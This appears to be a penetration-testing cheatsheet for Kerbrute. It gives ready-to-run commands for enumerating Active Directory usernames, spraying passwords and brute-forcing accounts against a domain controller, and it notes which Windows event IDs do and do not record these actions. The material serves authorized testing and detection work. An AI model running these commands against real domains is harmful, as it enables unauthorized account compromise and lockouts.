Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Kerbrute Cheatsheet

Fast Kerberos pre-authentication brute-forcer for username enumeration and password spraying.

  • GitHub: https://github.com/ropnop/kerbrute
  • Does not generate event ID 4625 (logon failure) during username enumeration
  • Generates event ID 4768 (TGT request) if Kerberos logging is enabled
  • Username enumeration does not cause account lockouts
  • Password spraying does count toward lockout thresholds

Basic Syntax

kerbrute <command> [flags]

Commands

CommandDescription
userenumEnumerate valid AD usernames via Kerberos
passwordspraySpray a single password against a list of users
bruteuserBrute-force a single user’s password
bruteforceBrute-force using user:password combo list

Global Flags

FlagDescription
-d DOMAINDomain to authenticate against (required)
--dc IPDomain Controller IP or hostname
-t THREADSNumber of threads (default: 10)
-o FILEOutput file for results
--safeSafe mode — abort if any account is locked out
--downgradeDowngrade to ARCFOUR-HMAC-MD5 encryption
-vVerbose output

Username Enumeration

Enumerate Valid Users from Wordlist

kerbrute userenum -d domain.local --dc 172.16.5.5 /path/to/userlist.txt

With Output File

kerbrute userenum -d domain.local --dc 172.16.5.5 -o valid_users.txt /path/to/userlist.txt

How it works: Sends AS-REQ without pre-authentication. If the KDC responds with PRINCIPAL UNKNOWN, the user doesn’t exist. If it prompts for pre-auth, the user is valid.

Password Spraying

Spray Single Password

kerbrute passwordspray -d domain.local --dc 172.16.5.5 valid_users.txt 'Welcome1'

Safe Mode (Stop on Lockout)

kerbrute passwordspray -d domain.local --dc 172.16.5.5 --safe valid_users.txt 'Welcome1'

Brute-Force Single User

kerbrute bruteuser -d domain.local --dc 172.16.5.5 /path/to/passwords.txt jsmith

Brute-Force with Combo List

File format: user:password (one per line)

kerbrute bruteforce -d domain.local --dc 172.16.5.5 combos.txt

Useful Username Wordlists

ListDescription
jsmith.txt48,705 flast format names
jsmith2.txtExtended flast list
top-usernames-shortlist.txtCommon usernames

Source: statistically-likely-usernames

Detection Notes

ActionEvent IDNotes
Username enumeration4768Only if Kerberos logging enabled via Group Policy
Password spraying4768 + 4771Failed pre-auth counts toward lockout